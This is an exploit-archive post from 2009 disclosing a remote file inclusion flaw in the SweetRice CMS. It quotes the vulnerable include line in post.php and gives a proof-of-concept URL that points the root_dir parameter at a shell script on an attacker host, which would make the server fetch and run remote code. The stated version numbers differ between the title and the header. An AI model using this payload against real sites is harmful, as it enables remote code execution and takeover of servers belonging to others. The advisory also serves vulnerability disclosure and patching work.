[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : SweetRice <= 0.5.3 Remote File Include Vulnerability
# Published : 2009-11-29
# Author : cr4wl3r
# Previous Title : ita-forum 5.1.32 SQL Injection
# Next Title : Sugar CRM 5.5.0.RC2 and 5.2.0j Multiple Remote Vulnerabilities
[ Discovered by cr4wl3r cr4wl3r[4t]linuxmail[dot]org ]
########################################################################
#SweetRice <= 0.5.0 Remote File Include Vulnerability
#Download Script : http://php.opensourcecms.com/scripts/redirect/download.php?id=353
#Dork : die("lamers attempt"); :P
########################################################################
#
#Vuln : ./sweetrice/_plugin/subscriber/inc/post.php (line 2)
# <?php
# include_once($root_dir."_plugin/fckeditor/fckeditor.php") ;
# ?>
#PoC : http://server/_plugin/subscriber/inc/post.php?root_dir=http://[attacker]/shell.txt???
#
#
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################
[ Gorontalo / 2009